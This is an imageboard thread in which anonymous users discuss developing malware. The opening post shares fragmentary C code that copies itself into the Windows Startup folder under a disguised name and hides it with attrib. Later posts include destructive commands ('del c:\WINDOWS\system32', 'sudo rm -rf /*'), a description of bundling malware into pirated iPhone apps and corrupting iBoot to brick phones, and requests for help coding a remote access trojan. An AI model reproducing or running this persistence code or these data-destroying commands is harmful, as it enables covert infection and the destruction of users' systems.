/mdg/ - Malware Development General

Does anyone in Sup Forums develop malware
If so, what are you working on

Remember, don't distribute anything you made or seen here without the victim's consent.

I'll start us off with some shitty C code that I've made a while ago that barely classifies as malicious.

Other urls found in this thread:


OP here, don't say I didn't tell you its shitty

char pathchecker[100] = "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\";

fileWrite(int co, FILE *d)
system("cd %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\");
char path3[200];
ExpandEnvironmentStrings("%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ntcpsys.dll", path3, sizeof(path3));
char *path3c = "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ntcpsys.dll\"";
d = fopen(path3, "a");
char hideCmd[200] = "attrib +h \"";
char disreadCmd[200] = "attrib -R \"";
strcat(hideCmd, path3c);
strcat(disreadCmd, path3c);

main(int argc, char *argv[])
HWND window;
FILE *f;
int c = 0;
//Remember this code
/*char *fileName;
sprintf(fileName, "newfile%d.txt", fc);
printf("%s\n", fileName);*/
strcat(pathchecker, argv[0]);
f = fopen(pathchecker, "r");
if (f == NULL)
char path2[500];
GetModuleFileName(NULL, path2, sizeof(path2));
char path[100] = "\" \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"";
strcat(path2, path);
char newpath[7] = "move \"";
strcat(newpath, path2);
fileWrite(c, f);
fileWrite(c, f);

I don't think anyone would talk about that here.

how do I install this program on my computer?

Compile it
Not reccomended if you looking in a malware thread

what does this code do?
t. stupid

I am actually very interested in this subject but I have no idea where to start from. Computer security is a very interesting topic to me. OP, do you have any tutorials or starting zones to point me to?

Learn from the best

You know you probably could use the source code of Windows 10 as an example of how to hide your malware.

New jailbreak is out and Pangu exploits remain unpatched. I've started looking into ways to piggyback malware onto pirated IPA files and seeing if Cydia Impactor would sign and load them. So far so good. Using bootloader vulnerabilities I've found on my own I'm able to seriously fuck up a few lines of code in the LLB and iBoot responsible for making stuff run as well as kicking the device to recovery. It can all be done from userland but requires a reboot. If you're a normie who doesn't know how use DFU or make backups this could brick your phone.

I do not plan on using this or releasing it. It's just for fun. I can't really do much damage because it'll only work on the iPhone 5s. Pangu JB only supports 64-bit devices and I haven't been able to exploit the bootloader on anything newer than a 5s. When I say bootloader I mean iBoot (second stage) not SecureROM (first stage). I'm pretty sure iH8sn0w has this too.


@echo off
del c:\WINDOWS\system32

Only tangentially related, but I remember when I used to go on slashdot (sometime around 2004-2006) I would see posts about an obfuscated C contest. Basically, upon a quick glance the code appears to do one thing, but when you actually compile/execute it, it does something completely different. I should check that out now that I actually know C.


I wanna code a RAT in C++.
I already have intermediate knowledge of Python and some knowledge of C++.

How should i begin doing this?

>console application
>posix api
>Windows api
Hello HF
It's beyond shitty


Learn C and winapi properly also windows internals

i recognized the way you type and can't help but notice your autism gets triggered by these people.
could you give us some tips on life as a pro hacker/excuse me cracker?

sudo rm -rf /*

Fap to anime
Live in basement
Dont go outside
Hack the planet

what APi should i learn if i want to code rat for Loonix?